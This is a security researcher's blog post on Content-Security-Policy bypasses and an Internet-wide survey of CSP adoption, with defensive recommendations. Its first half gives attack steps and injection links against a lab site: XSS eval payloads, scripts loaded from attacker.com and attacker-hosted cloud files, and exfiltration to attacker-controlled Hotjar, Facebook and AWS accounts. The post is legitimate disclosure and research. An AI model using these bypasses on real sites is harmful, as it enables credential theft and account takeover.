TL;DR
This post is a summary of my talk at the Defcon 31 AppSec Village in August 2023, and part of what I will explain in Canada at the SecTor conference on the 24th of October 2023 at 4:00 PM.
There are two (big) blocks in this post. Sorry for the length <(_ _)>:
- The first part is about the not so well-known CSP bypasses that I found during this research. These can be of use in your next pentest, bug bounty, etc. Have a look at the 8 third-party domains that can be abused to bypass a strict policy to execute that sweet Cross-Site Scripting (XSS) or clickjacking proof of concept that was initially being blocked.
- The second part takes a step back and delves into the process of getting Content-Security-Policy (CSP) data from the top 1 million sites and the conclusions I drew from it. After reading this part you will get a sense of how widespread and well-implemented CSP is across the Internet. You will also learn the common pitfalls people fall into when implementing the policy. The tool I wrote to scan and collect this information and review the results can be found at https://github.com/sensepost/dresscode
Context
Last year I was working on a web application assessment, one of these assessments that are repeated every year in which the analyst has to face a hardened application. Therefore, every year, the report gets smaller and smaller when we look at the number of vulnerabilities.
By reading the previous year’s assessment report I spotted a nice stored XSS. When I went to replicate it, I found a relatively stringent Content Security Policy (CSP), which contained the directive “script-src” allowing only “nonced” scripts. This policy prevented me from exploiting the same stored XSS. I also found many other XSS vectors within the page, but all of them were prevented by the CSP policy. I was sad.
After recovering from the disappointment, I thought I should find a way to bypass their CSP. Long story short, I found a way by injecting my own JavaScript code into a legitimate eval function used within an allowed script (one that had the adequate nonce). In addition, I was able to exploit other reflected XSS vectors to carry out a UI Redressing attack that mimicked a login panel and exfiltrated the harvested credentials to www.google-analytics.com.
From that moment I became obsessed with finding new ways to bypass CSP that were not so well documented or known out there. It is not my intention to explain the two previous vulnerabilities here, but instead to show the results of the subsequent research on CSP.
The outcome of that research was twofold:
- To find new ways to bypass CSP which I can add to my toolbox for future assessments.
- To obtain a better view of the health status of CSP across the Internet.
So, let’s dive into each topic separately, starting with the more practical section, the bypasses:
1 – Bypasses
You will be able to see the current health status of CSP across the Internet in section #2, but for the practical folks, here are the bypasses I found during the research.
Disclaimer: I found a lot of information out there to bypass CSP by using JSON with padding (JSONP) and loading outdated AngularJS libraries (e.g. here, here and here), but I wanted to explore new ways to bypass the policies.
I found six new third-parties to abuse to bypass CSP controls and two additional ones that were being exploited in bug bounty programs and publicly talked about, but not very well known.
Regarding the six new vectors, I was not able to easily find public information describing how to use them to bypass CSP. Nevertheless, I think the eight of them deserve to be more popularised, so as a pentester, you can use them in your future assessments or bug bounties, and as a defender or developer, you can avoid them when defining your site’s CSP.
Here’s the list of third parties that I found you can easily abuse when you find them in a CSP. Some of them will be useful to exfiltrate data from the target site when found in directives such as “connect-src”, and others to execute code when found in directives such as “script-src”:
# | Entity | Allowed Domain | Capabilities | Publicly Documented | Number of Sites |
1 | Facebook | www.facebook.com, *.facebook.com | Exfil | No | 7310 |
2 | Hotjar | *.hotjar.com, ask.hotjar.io | Exfil | No | 2824 |
3 | Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exec | Yes | 2208 |
4 | Amazon CloudFront | *.cloudfront.net | Exfil, Exec | No | 1441 |
5 | Amazon AWS | *.amazonaws.com | Exfil, Exec | No | 860 |
6 | Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfil, Exec | No | 90 |
7 | Salesforce Heroku | *.herokuapp.com | Exfil, Exec | No | 25 |
8 | Google Firebase | *.firebaseapp.com | Exfil, Exec | Yes | 19 |
In the last column, you can see the number of sites that I found within the top 1 million where the “Allowed Domain” was present in their CSP. I have ignored www.google-analytics.com on purpose here, as we already had a lot of information out there to bypass CSP using Google Analytics (e.g. here and here) and I wanted to explore new vectors.
Please do not take this as a comprehensive list of third-party domains that can be abused to bypass CSP. There might be others out there that I haven’t tested, so don’t consider your CSP 100% secure just because it doesn’t include these domains. Always be cautious about which third-party domains you trust within your CSP.
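As a rough illustration of how the table can be put to work, the sketch below flags sources in a policy that fall under one of the eight allowed-domain patterns listed above. The function names and the matching rules are my own simplification (they ignore ports and paths), so treat it as a starting point rather than a complete CSP matcher.

```python
# Allowed-domain patterns copied from the table above.
ABUSABLE = {
    "Facebook": ["www.facebook.com", "*.facebook.com"],
    "Hotjar": ["*.hotjar.com", "ask.hotjar.io"],
    "Jsdelivr": ["*.jsdelivr.com", "cdn.jsdelivr.net"],
    "Amazon CloudFront": ["*.cloudfront.net"],
    "Amazon AWS": ["*.amazonaws.com"],
    "Azure Websites": ["*.azurewebsites.net", "*.azurestaticapps.net"],
    "Salesforce Heroku": ["*.herokuapp.com"],
    "Google Firebase": ["*.firebaseapp.com"],
}


def _host(source):
    """Reduce a CSP host-source (optional scheme, port, path) to its host part."""
    s = source.lower()
    if "://" in s:
        s = s.split("://", 1)[1]
    return s.split("/", 1)[0].split(":", 1)[0]


def _overlaps(host, pattern):
    """True if a CSP host (possibly '*.x') overlaps a listed pattern."""
    wildcard = host.startswith("*.")
    bare = host[2:] if wildcard else host
    if pattern.startswith("*."):
        base = pattern[2:]
        return bare == base or bare.endswith("." + base)
    # Exact listed host: match it directly or via a wildcard that covers it.
    return bare == pattern or (wildcard and pattern.endswith("." + bare))


def find_abusable(policy):
    """Return (directive, source, entity) tuples for abusable third parties."""
    hits = []
    for chunk in policy.split(";"):
        tokens = chunk.split()
        if len(tokens) < 2:
            continue
        directive = tokens[0].lower()
        for src in tokens[1:]:
            if src.startswith("'"):  # keywords, nonces and hashes
                continue
            host = _host(src)
            for entity, patterns in ABUSABLE.items():
                if any(_overlaps(host, p) for p in patterns):
                    hits.append((directive, src, entity))
    return hits
```

Whether a hit matters still depends on the directive it appears in: a match under “connect-src” points to exfiltration, one under “script-src” to execution.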
Lab Environment
To demonstrate the bypasses, I could have used any site found on my database, but I prefer not to go to jail just for some dummy demos, so I created a lab to demonstrate potential impact of the bypasses. The lab is a site, called Keyfc, where you can login and access a private page:
The private page will have the secret ingredient of the Keyfc recipe:
It also has a section to change your profile data, such as email, password or security questions and answers:
I added two vulnerabilities to this page. The first one (vulnerability #1) is present in the file secret.php:
You can see that whatever you pass to the parameter “msg” will be injected within the allowed script. So, if you visit the following URL, you will get the following HTML code in response:
The second vulnerability (vulnerability #2) will be found in the same page “secret.php” and it will just include in the DOM a new script with its source pointing to the URL passed through the parameter “source”:
So, if we try to load a script controlled by an attacker by visiting the following URL:
https://<site>/secret.php?source=https://attacker.com/exec.js
The script “exec.js” hosted in the attacker’s controlled domain would be executed. Of course, if the CSP has an allowlist within the “script-src” and the domain “attacker.com” is not there, the script will never be executed and we would get the following error in the console of our browser/agent:
Refused to load the script 'https://attacker.com/exec.js' because it violates the following Content Security Policy directive: "script-src [...]". Note that 'script-src-elem' was not explicitly set, so 'script-src' is used as a fallback.
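To make the allowlist decision behind that error more concrete, here is a simplified sketch of how a browser picks the governing directive and compares an external script URL against it. It is not the full matching algorithm from the CSP specification: it ignores ports, paths, 'self', nonces and hashes, and the function names are hypothetical.

```python
from urllib.parse import urlparse


def parse_csp(policy):
    """Split a policy string into {directive: [values]}; first occurrence wins."""
    directives = {}
    for chunk in policy.split(";"):
        tokens = chunk.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def host_matches(pattern, host):
    """'*.a.com' matches 'x.a.com' but not 'a.com'; otherwise exact match."""
    pattern, host = pattern.lower(), host.lower()
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return host == pattern


def script_allowed(policy, url):
    """Would an external, nonce-less script at `url` pass the allowlist?"""
    d = parse_csp(policy)
    # Fallback chain: script-src-elem -> script-src -> default-src.
    sources = d.get("script-src-elem", d.get("script-src", d.get("default-src")))
    if sources is None:
        return True  # nothing in the policy restricts scripts
    target = urlparse(url)
    for src in sources:
        if src.startswith("'"):
            continue  # keywords, nonces, hashes: out of scope for this sketch
        if src == "*":
            return True
        if src.endswith(":") and "/" not in src:  # scheme-source, e.g. https:
            if target.scheme == src[:-1].lower():
                return True
            continue
        parts = src.split("://", 1)
        scheme = parts[0].lower() if len(parts) == 2 else None
        host = parts[-1].split("/", 1)[0].split(":", 1)[0]
        if scheme and scheme != target.scheme:
            continue
        if host_matches(host, target.hostname or ""):
            return True
    return False
```

With a policy such as `script-src 'nonce-...' cdn.jsdelivr.net`, the attacker.com URL is rejected while anything hosted under cdn.jsdelivr.net passes, which is exactly the gap the following sections abuse.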
So, let’s find ways to bypass this restriction.
Proof of Concepts
The following sections will explain the process of bypassing CSP through third party abuse.
Abuse #1 – Hotjar
This one allows an attacker to exfiltrate data, pretty much as we would do with the classical www.google-analytics.com exfiltration. An example CSP vulnerable to this would be the following:
default-src 'self' ask.hotjar.io *.hotjar.com;
script-src 'nonce-zM1mRhUyMJ13LFoja7kkF2pH' *.hotjar.com;
[...]
For exfiltration purposes, instead of the “default-src”, we could work with a CSP that specified “connect-src” directive as well.
As an attacker, if we wanted to exfiltrate the security question and answer of a target user, we would not be able to exfiltrate to a random domain, so we would need to use Hotjar for that purpose. For that, we follow these general steps (keep in mind this is just one example; there could be many other ways to exfiltrate to Hotjar):
- Open an account in Hotjar
- Create a poll to insert in the attacker’s controlled site
- Sniff your HTTP traffic and answer the poll
- Mimic that “poll answer” in the victim-side
- Obtain the “poll answer” in your attacker’s hotjar dashboard.
This is the code to exfiltrate to Hotjar that we need to execute on the victim’s agent:
If we encode the previous PoC to Base64 and take advantage of the vulnerability #1 (XSS) present in the page “secret.php” of the target page, we would end up with a link similar to this one:
https://hotjar.keyfc.xyz/secret.php?msg=hello%22;eval(atob(%22ZmV0Y2[...]bGUucGIGk7Cn0pOwo%3d%22));//
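For reference, a link of that shape can be assembled with a few lines of Python. This is only a sketch of the encoding step: the JavaScript passed in is a harmless placeholder rather than the Hotjar PoC, and `build_link` is a hypothetical helper name.

```python
import base64
from urllib.parse import quote


def build_link(base_url, js_payload):
    """Wrap a JS payload as hello";eval(atob("<base64>"));// in the msg parameter."""
    b64 = base64.b64encode(js_payload.encode("utf-8")).decode("ascii")
    injected = 'hello";eval(atob("' + b64 + '"));//'
    # Percent-encode quotes and Base64 '=' / '+' so they survive the query
    # string; the characters in `safe` are left readable, as in the link above.
    return base_url + "?msg=" + quote(injected, safe="();/")


if __name__ == "__main__":
    # Placeholder payload for the lab only.
    print(build_link("https://hotjar.keyfc.xyz/secret.php", "alert(1)"))
```

Encoding `+` matters in particular: left as-is, it would typically be decoded as a space on the server side and corrupt the Base64 string.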
If we make the victim click on this link or a shortened version of it (via bit.ly or any other URL shortener service) we will have the security question and answer exfiltrated to our Hotjar dashboard:
Abuse #2 – Facebook
This one allows an attacker to exfiltrate data to a Facebook developer dashboard. I found more than 7K sites in my DB that allowed “www.facebook.com” or “*.facebook.com” in the CSP directive.
To put this finding in perspective, the “gold standard” for exfiltrating data while bypassing CSP could be considered “Google Analytics”, for which there are a lot of blog posts and articles describing how to do it (e.g. here and here). For this case, I found 6K sites in my DB allowing “google-analytics.com” in their CSP. Despite the similar prevalence of both technologies, it is interesting that exfiltrating data with Facebook is not very well known and, to my knowledge, no public blog posts describing it can be found on the Internet.
An example CSP vulnerable to this would be the following:
default-src 'self' www.facebook.com; script-src 'nonce-3FahAWXnLOYTy8KNO3V6Fsmd' *.facebook.net; [...]
In this case, if an attacker wanted to exfiltrate the secret ingredient from the target page, the general process would be the following (heads-up, this is not a detailed step by step):
- Create a Facebook Developer account here.
- Create a new “Facebook Login” app and select “Website”.
- Go to “Settings -> Basic” and get your “App ID”
- In the target site you want to exfiltrate data from, you can exfiltrate data by directly using the Facebook SDK gadget “fbq” through a “customEvent” and the data payload.
- Go to your App “Event Manager” and select the application you created (note the event manager can be found at a URL similar to this: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events).
- Select the tab “Test Events” to see the events being sent out by “your” web site.
This is the code we want to execute on the victim’s browser:
The first line would initialise the Facebook tracking pixel to point to the attacker’s controlled account. The second line would exfiltrate the secret ingredient as a custom event generated in the page.
If, by any way, we manage to execute that code in the victim’s browser, we will see the following in our Facebook Developer account event manager:
Abuse #3 – JS Delivr
In this case, using jsdelivr we would be able to execute code.
I have found this method already mentioned in some HackerOne reports, so I’m not claiming it was originally discovered here, but I think the method is not really well-known, so let’s spread awareness of it a bit more.
This is a sample CSP that can be bypassed:
default-src 'self'; script-src 'nonce-3FahAWXnLOYTy8KNO3V6Fsmd' cdn.jsdelivr.net; [...]
Assuming our objective now is to change the victim user password and security answer, we can use the following payload:
The general steps to follow to execute this payload on the target site that allows cdn.jsdelivr.net would be the following:
- Upload your payload to a new repository in GitHub or npm.
- Ask jsdelivr.com nicely to cache your code by following a very specific URL pattern like this:
- Github: https://cdn.jsdelivr.net/gh/user/repo@version/file
- NPM: https://cdn.jsdelivr.net/npm/package@version/file
- Exploit vulnerability #2 by sending the allowed cached script in cdn.jsdelivr.net.
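The two URL patterns above are easy to get wrong by hand, so here is a small sketch that builds them. The helper names are hypothetical; the version segment is treated as optional, since the lab link further down uses the pattern without one.

```python
def jsdelivr_gh(user, repo, path, version=None):
    """Build a cdn.jsdelivr.net URL for a file in a GitHub repository."""
    ref = f"{repo}@{version}" if version else repo
    return f"https://cdn.jsdelivr.net/gh/{user}/{ref}/{path}"


def jsdelivr_npm(package, path, version=None):
    """Build a cdn.jsdelivr.net URL for a file in an npm package."""
    ref = f"{package}@{version}" if version else package
    return f"https://cdn.jsdelivr.net/npm/{ref}/{path}"


if __name__ == "__main__":
    print(jsdelivr_gh("user", "repo", "file", version="version"))
    print(jsdelivr_npm("package", "file", version="version"))
```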
Now, to exploit vulnerability #2 in our lab, we just need to send the following link to the victim and hope they click it:
https://jsdelivr.keyfc.com/secret.php?source=https://cdn.jsdelivr.net/gh/felmoltor/bunchofjs/exec.js
If the victim clicks on it, the code in “exec.js” will be executed and the password and security answer will be changed:
Abuse #4 – Amazon AWS
Using Amazon AWS we would be able to exfiltrate data, but I am confident that it can also be used to execute code. This is a sample CSP that can be bypassed:
default-src 'self'; script-src 'nonce-3FahAWXnLOYTy8KNO3V6Fsmd' *.amazonaws.com; [...]
We need to create two components in our Amazon AWS account:
- An API Gateway that will be public as a subdomain of amazonaws.com
- A Lambda function to decode the exfiltrated data coming from the API Gateway as a parameter
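To give an idea of the second component, a Lambda function of this kind could look roughly like the sketch below. It is not the code from the talk: it assumes a Python runtime, an API Gateway proxy integration (which passes the query string in `queryStringParameters`), and a hypothetical parameter named `d` carrying URL-safe Base64 data.

```python
import base64
import json


def decode_param(event, name="d"):
    """Extract and Base64-decode the exfiltrated value from the query string."""
    params = event.get("queryStringParameters") or {}
    raw = params.get(name, "")
    try:
        padded = raw + "=" * (-len(raw) % 4)  # tolerate stripped padding
        return base64.urlsafe_b64decode(padded).decode("utf-8", errors="replace")
    except ValueError:
        return raw  # not valid Base64: keep the raw value


def lambda_handler(event, context):
    # Anything printed by a Lambda function ends up in its CloudWatch log group.
    print(json.dumps({"exfil": decode_param(event)}))
    return {
        "statusCode": 200,
        # Permissive CORS so the browser does not report a failed request.
        "headers": {"Access-Control-Allow-Origin": "*"},
        "body": "",
    }
```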
The code to execute on the victim’s browser and the Lambda function code is the following:
If we get that code executed on the victim’s browser, we will have the following in the attacker’s CloudWatch logs:
Abuses #5, #6, #7, and #8
I don’t want to make this post longer than it already is, so the other four PoCs are only briefly mentioned here. They cover the following four third-party providers:
- Azure AppServices and Static Webapps (~100 sites in the DB)
- Amazon Cloudfront (~100 sites)
- Salesforce Heroku (~18 sites)
- Google Firebase (~15 sites)
These four third-party services were not found frequently in the top 1 million sites database, but you never know when you will find them on your next pentest or bug bounty, so they might be useful to you.
Due to the similarity to PoC #4, you just need to be aware that the general approach to each of them would be the same:
- Register an account with the third party
- Follow their guidelines to set up a web application or host a project with them, e.g.:
- Azure AppServices and Static Webapps
- Amazon Cloudfront
- Heroku Hosting
- Firebase Hosting
- Upload the attacker payloads to these projects
- Take advantage of the hole in the CSP that allows these third-party domains. For example, to exploit vulnerability #2 of the lab, you would send the following links to the victim:
- https://cloudfront.keyfc.com/secret.php?source=https://d15xoolnwhr08.cloudfront.net/js/exec.js
- https://azure.keyfc.com/secret.php?source=https://nice-dune-08c8da410.3.azurestaticapps.net/exec.js
- https://heroku.keyfc.com/secret.php?source=https://exfiltest-75310ac89c2a.herokuapp.com/exec.js
- https://firebase.keyfc.com/secret.php?source=https://demo-defcon.firebaseapp.com/exec.js
2 – CSP Health Status
Note: I am assuming you have previous knowledge of what CSP is and how this security mechanism works. Otherwise, refer to the Mozilla site for more information.
To obtain a better view of the state of CSP on the Internet, I needed to gather the HTTP headers myself, explore them, parse the CSP information out from these and reach some conclusions. So I decided to retrieve this information from the top 1 million sites on the Internet (In this case: Majestic Million and Cisco Umbrella). For this to work I needed to program something scalable that could scan all those web sites in a reasonable amount of time.
The Architecture
I needed to make some architectural decisions here, such as which database to store the scraped data in and which programming paradigm to use for scanning and parsing the data.
Regarding the database, I started with a SQLite3 database, jumped later to MySQL in various forms and finally moved to MongoDB. To help me decide which one to use, I drew a chart of the time taken to process and insert 10,000 entries with HTTP header data.
The orange line, which represented MongoDB, was clearly the winner in this contest:
Ok, so now that I have decided what database to use, let’s jump into comparing the different programming paradigms.
I wanted to compare a classical for loop requesting the headers sequentially with the python library “requests” with an asynchronous programming approach using the python library “aiohttp“.
I like charts, so let’s compare each approach. Here is the time taken to poll the headers of 500 web sites with both the sequential and asynchronous approach. The blue bar is the sequential approach, which took 26 minutes, and the orange bar represents the asynchronous approach, which took 2:14 minutes.
This allowed me to reduce the time taken to scan the top 1 million sites from ~32 days to ~3 days. You can take a look at the asynchronous code here.
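The speed-up comes from keeping many requests in flight at once instead of waiting for each response in turn. The sketch below shows that pattern with the standard library only: `fetch_headers` is a stand-in coroutine that sleeps instead of performing an HTTP request (in the real tool that role is played by aiohttp), and the concurrency limit of 100 is an arbitrary assumption.

```python
import asyncio


async def fetch_headers(site):
    """Stand-in for an HTTP request; simulates network latency only."""
    await asyncio.sleep(0.01)
    return {"site": site, "headers": {}}


async def scan(sites, fetch=fetch_headers, limit=100):
    """Fetch all sites concurrently, with at most `limit` requests in flight."""
    sem = asyncio.Semaphore(limit)

    async def one(site):
        async with sem:
            try:
                return await fetch(site)
            except Exception as exc:  # one failing site must not stop the scan
                return {"site": site, "error": repr(exc)}

    # gather() returns the results in the same order as the input list.
    return await asyncio.gather(*(one(s) for s in sites))


if __name__ == "__main__":
    results = asyncio.run(scan([f"site{i}.example" for i in range(500)]))
    print(len(results), "sites processed")
```

The semaphore is the piece worth tuning: too low and the scan is barely faster than the sequential loop, too high and the scanner starts hitting local socket or DNS limits.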
Good! Time goes down, stonks go up.
In summary, the architecture of the solution would look like this: a jumpbox scanning the sites using aiohttp, managing the datasets with the pandas library, then storing the information in a MongoDB, and finally, tapping into this information through a Dashboard programmed with python Dash and Plotly express:
Away with the efficiency comparison now. Let’s dig into the ingestion process of the data.
- Collect headers from the top 1 million sites chosen (Majestic million and Cisco Umbrella).
- Parse the CSP information from the headers.
- Assign the document a country (first by ccTLD, then by IP address geolocation or by WHOIS information)
- Spot weaknesses and potential bypasses (see the first section)
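The second step of that list can be sketched as follows: take the response headers of a site and turn them into a document ready to be stored. The field names of the resulting document are my own assumption, not necessarily the schema used by the tool.

```python
def parse_policy(value):
    """Turn a CSP header value into {directive: [values]}."""
    directives = {}
    for chunk in value.split(";"):
        tokens = chunk.split()
        if tokens:
            # Browsers ignore repeated directives, so keep the first one only.
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def csp_document(site, headers):
    """Build a storable document from a site's response headers."""
    lowered = {k.lower(): v for k, v in headers.items()}  # names are case-insensitive
    enforced = lowered.get("content-security-policy")
    report_only = lowered.get("content-security-policy-report-only")
    return {
        "site": site,
        "has_csp": enforced is not None,
        "csp": parse_policy(enforced) if enforced else {},
        "csp_report_only": parse_policy(report_only) if report_only else {},
    }
```

Keeping the report-only policy separate matters for the statistics: a site that only sends Content-Security-Policy-Report-Only is observing violations, not blocking them.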
Dashboard – CSP Health Status
From the Dashboard we can obtain interesting information, such as the percentage of sites using CSP, which disappointingly does not even reach 10%:
If we are to make a bit of self-criticism in the security industry, I would say that we are not doing our job. I would compare this situation to the commercial where 9 out of 10 dentists recommend that you brush your teeth, but it’s the opposite: 9 out of 10 dentists are not brushing their teeth or encouraging their clients to do so:
Jokes aside, luckily, there’s a positive side to it. The most popular sites implement CSP more frequently than the less popular ones, as can be observed in the following chart:
The previous chart shows the percentage of CSP usage if we sort the sites by popularity and then take the top 1000, top 10000, and top 100000.
We can also explore other information from the dashboard, such as the most used CSP directives:
We can observe that the most popular on this list are “upgrade-insecure-requests” and “frame-ancestors”, followed by many other *-src directives. This is understandable from the point of view of a website administrator: those two are the least complicated directives to set up. You don’t need to allowlist anything or maintain the allowlist, as “upgrade-insecure-requests” is used by itself, without any value, and the immense majority of “frame-ancestors” values are configured with “self” or “none”.
The five least frequently configured directives (and the CSP level where those directives are available) are:
- object-src (L1)
- media-src (L1)
- worker-src (L3)
- base-uri (L2)
- report-uri (L1 – Deprecated in favor of report-to)
Clearly, those are not used enough despite the positive impact they can have on the security of your website, probably due to a lack of understanding of what these directives protect us against (more on that later).
In the dashboard, we can take a look at the specific values configured for each CSP directive. Due to its importance, we will use “script-src” as an example for this:
We can observe that the most frequent directive values used are “unsafe-inline” and “unsafe-eval“. Looking from the percentage perspective:
- Presence of “unsafe-inline”:
- Relative to sites with CSP headers: 21,898/124,098 = 17%
- Relative to sites defining a “script-src”: 21,898/24,793 = 88%
- Presence of “unsafe-eval”:
- Relative to sites with CSP headers: 19,931/124,098 = 16%
- Relative to sites defining a “script-src”: 19,931/24,793 = 80%
If we come back to the previous dentist analogy, not only is there one single dentist out of ten that brushes their teeth (implements CSP and defines a “script-src”), but that dentist also brushes their teeth with sugar 6 days per week:
Moving on to another topic in the Dashboard. I tried to count the average number of weaknesses per country, just for a bit of fun:
That intense red colour corresponds to an average count of eight weaknesses per country. No clear winner or medals for anyone here, sorry.
Now let’s talk a bit about the weaknesses. We can take a look at the most frequent ones detected:
Topping the list we have the lack of “report-to” directives, a weakness that was detected 116,991 times. Keeping in mind that the number of sites with CSP headers is 124,098, this weakness is present in 94% of the sites with CSP headers. This indicates that most of the sites implementing CSP are currently not actively monitoring potential attacks in real time with this directive (95 of these sites, 0.08%, were using the deprecated “report-uri” directive instead).
It is also very interesting to see that the more recent directive, “report-to”, does not even appear in the list of the 18 most used directives, but its older, deprecated cousin “report-uri” does.
This might be due to the problem brought to my attention during my Defcon 31 AppSec talk, where naugtur let me know that enabling this directive could lead to a high volume of generated traffic, potentially producing a DDoS scenario. Imagine what would happen when a highly popular site forgets to allowlist their Google Analytics domain in their CSP, as described by Scott Helme here. A way to prevent this scenario would be to use third-party solutions, such as Cloudflare or report-uri.io, which externalise the volumetric problem, or to implement your own report-to endpoint with this in mind (one example is csp-report-lite).
Another possible reason is that “report-to” directive is not yet supported by all major browsers. Specifically, Firefox and Safari do not support it yet, whereas “report-uri” is supported by all major browsers:
Following on in that list is the “base-uri“, which is not defined in 116,794 of the sites. This is another shocking 94% of the sites defining CSP but not using that feature.
This might be due to the lack of a clear understanding of what this directive protects you against: in this case, injections that change the <base> HTML tag to point to arbitrary attacker domains. One good example of such attacks is this Gitlab vulnerability disclosed in HackerOne in 2022 (or here and here).
So, remember to make a wish if you come across a CSP with those two directives:
Let’s now focus our attention on the less frequent weaknesses detected:
We will look at “Third Party Abuse”.
It is found in 11,349 sites, which is ~9% of the sites implementing CSP. This means that 9% of the sites contain a weakness that can potentially allow an attacker to bypass the policy by abusing the third-party trust.
Regarding the last item of the list: “Lenient Scheme“. We find this weakness present in 9,267 sites, which is ~7% of the sites defining CSP. That is, the sites defining a CSP that allows a protocol handler such as “https:” or “http:” within a directive. This means that all resources loaded from a source coming from an “https” channel would be happily allowed. Depending on the directive this source is located in, the impact would be different (e.g. for script-src ‘https:’ all scripts coming from an https will be allowed to be executed within the page context. For connect-src ‘https:’, all outbound connections to an https destination will be allowed).
These may look like small percentages, but think about it this way: almost 1 in every 10 sites that have defined a CSP, and expect to have protection against XSS and similar injections, can be bypassed by abusing one of the third-party domains allowed in the policy or by providing a resource coming from an “https:” source. This is a lot of sites that pile onto the ~90% of total sites that do not define CSP and the ~17% of sites defining CSP but allowing “unsafe-inline” and “unsafe-eval”.
Finally, there is a section in the dashboard where the specific weaknesses can be observed listed in table form. Some of the weaknesses that you can query are:
- Third Party Abuse
- Orphan Domains
- Unsafe Eval
- Unsafe Inline
- No CSP Defined
- Only CSP-Report-Only Defined
- etc.
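A few of these checks are simple enough to sketch in code. The function below assumes the policy has already been parsed into a dict mapping directive names to lists of values; the labels “Missing report-to” and “Missing base-uri” are names I made up for this example, and the rules are a simplification of what a real scanner would need.

```python
def find_weaknesses(directives):
    """Return weakness labels for a parsed policy ({directive: [values]})."""
    if not directives:
        return ["No CSP Defined"]
    found = []
    # script-src falls back to default-src when it is not defined.
    script = directives.get("script-src", directives.get("default-src", []))
    script = [v.lower() for v in script]
    if "'unsafe-inline'" in script:
        found.append("Unsafe Inline")
    if "'unsafe-eval'" in script:
        found.append("Unsafe Eval")
    if "report-to" not in directives:
        found.append("Missing report-to")
    if "base-uri" not in directives:
        found.append("Missing base-uri")
    # A bare scheme such as https: allows any host served over that scheme.
    if any(v.lower() in ("http:", "https:")
           for values in directives.values() for v in values):
        found.append("Lenient Scheme")
    return found
```

For example, a policy consisting only of `script-src 'self' 'unsafe-inline' https:` would come back with four labels: Unsafe Inline, Missing report-to, Missing base-uri and Lenient Scheme.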
One weakness from that list that we have not yet talked about is “Orphan Domains”. In this case, the CSP defines a directive allowing a particular domain as a source, such as script-src subdomain.mydomain.com. If mydomain.com is potentially not registered (i.e. we get an NXDOMAIN response from the DNS and WHOIS does not return any results for this domain), we can consider the CSP bypassable: it only requires you to register “mydomain.com” and now you can execute scripts on the target domain.
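The DNS half of that check could be sketched as shown below. Two loud caveats: the registrable domain is guessed naively from the last two labels (real code would need the Public Suffix List to handle suffixes such as co.uk), and a failed lookup only makes a domain a candidate, which still has to be confirmed through WHOIS. The function names are hypothetical.

```python
import socket


def registrable_domain(host):
    """Naive guess: the last two labels of the host (wildcard prefix dropped)."""
    labels = host.lower().lstrip("*.").split(".")
    return ".".join(labels[-2:])


def resolves(domain):
    """True if the system resolver returns at least one address for the domain."""
    try:
        socket.getaddrinfo(domain, None)
        return True
    except socket.gaierror:
        return False


def orphan_candidates(hosts, resolver=resolves):
    """Return the registrable domains from `hosts` that fail to resolve."""
    checked = {}
    for host in hosts:
        domain = registrable_domain(host)
        if domain not in checked:  # resolve each domain only once
            checked[domain] = resolver(domain)
    return sorted(d for d, ok in checked.items() if not ok)
```

The `resolver` parameter is there so the lookup can be swapped out, for instance for a cached or rate-limited resolver when checking hundreds of thousands of policies.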
The dashboard can show us the domains affected by this in the “Weakness” section:
Conclusions
We have looked at the current status of CSP on the Internet in the second section.
~17% of sites had the “unsafe-inline” value in their CSP and ~16% had the “unsafe-eval” value.
Other unsafe settings, such as having orphan domains allowed in their policy or lenient handlers, allowing any source or connect destination as long as it conformed to the http: or https: schemes, were also found.
It is undeniable that CSP brings effective protection to many sites on the Internet and the standard is still alive and well, with Level 3 of the standard currently in Working Draft. This is good news, as it will bring more control and granularity over what content can be executed on the sites.
But, sadly, when we look at the usage level, the current status of CSP is not the best across the Internet.
We have been living with CSP for a long time (the first level of the policy was approved in 2012, almost 11 years ago), and we are still not implementing it broadly. It barely reaches a 30% presence in the top 1000 sites on the Internet, and when we increase the scope of the study to a larger set of sites, the percentage drops to a mere 10%.
I’m not advocating for 100% use of CSP, as there will be static sites with a reduced attack surface where the benefit of implementing it would be minimal when compared to the risk of the page being exposed. But a 10% presence of this useful security feature seems to be a really low number from all perspectives.
In the first section, we looked at six new vectors to bypass CSP and two that I have found on HackerOne reports, but were not so well-known, as I could not find blog posts or challenges explaining them in detail.
Approximately 9% of the sites defining a CSP contained one of the eight instances of “Third-Party Abuse” described here.
This indicates that 1 in every 11 sites can potentially have their CSP bypassed due to the blind trust in third-parties.
This, in conjunction with the unsafe settings described before, makes me think that, as good a mechanism as CSP is, its complexity and the effort required for its maintenance are keeping people from implementing it.
To counteract this, the security community and developers need to be clear about the benefits of implementing a CSP and advocate for its safe implementation. For that I have some recommendations.
Recommendations
- Implement CSP. The bypasses explained here do not mean it is not worth it. It can be an excellent tool to deter attackers and reduce the attack surface your clients and users are exposed to when navigating your web site.
- Use Subresource Integrity (SRI) in conjunction with CSP.
- When possible, try not to use the “unsafe-inline” and “unsafe-eval” values. Migrate to strict policies based on “nonce” and “hash” source expressions.
- Use “strict-dynamic” to reduce operational load if that helps your company adopt strict Content Security Policies, but be aware that it gives allowed scripts the capability to include additional scripts.
- Reduce allowed third-party domains in your CSP to a minimum. Instead, host the libraries on your own domain where possible.
- If third-party domains are required in your CSP, do not add them with wildcards (e.g. *.amazonaws.com).
- If you have enough bandwidth and capabilities, use report-to with report-sample to observe in real time what is happening in your users’ browsers, including potential attacks against them via your web site.
- Consider using commercial solutions to monitor client-side JavaScript (hint: Search for “client-side protection javascript formjacking” in Google).
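To make some of these recommendations more tangible, here is a minimal sketch of how a nonce-based policy header could be generated per response. The exact set of directives and the reporting group name are assumptions for illustration; adapt them to what your site actually loads.

```python
import secrets


def new_nonce():
    """Generate a fresh, unpredictable nonce; use a new one for every response."""
    return secrets.token_urlsafe(18)


def strict_csp(nonce, report_group=None):
    """Build a nonce-based policy without host allowlists or unsafe-* values."""
    script_src = f"script-src 'nonce-{nonce}' 'strict-dynamic'"
    if report_group:
        script_src += " 'report-sample'"
    parts = [
        "default-src 'self'",
        script_src,
        "object-src 'none'",
        "base-uri 'none'",
        "frame-ancestors 'self'",
    ]
    if report_group:
        # The group name must be declared separately in a reporting header
        # (Reporting-Endpoints or Report-To) sent by the same site.
        parts.append(f"report-to {report_group}")
    return "; ".join(parts)


if __name__ == "__main__":
    nonce = new_nonce()
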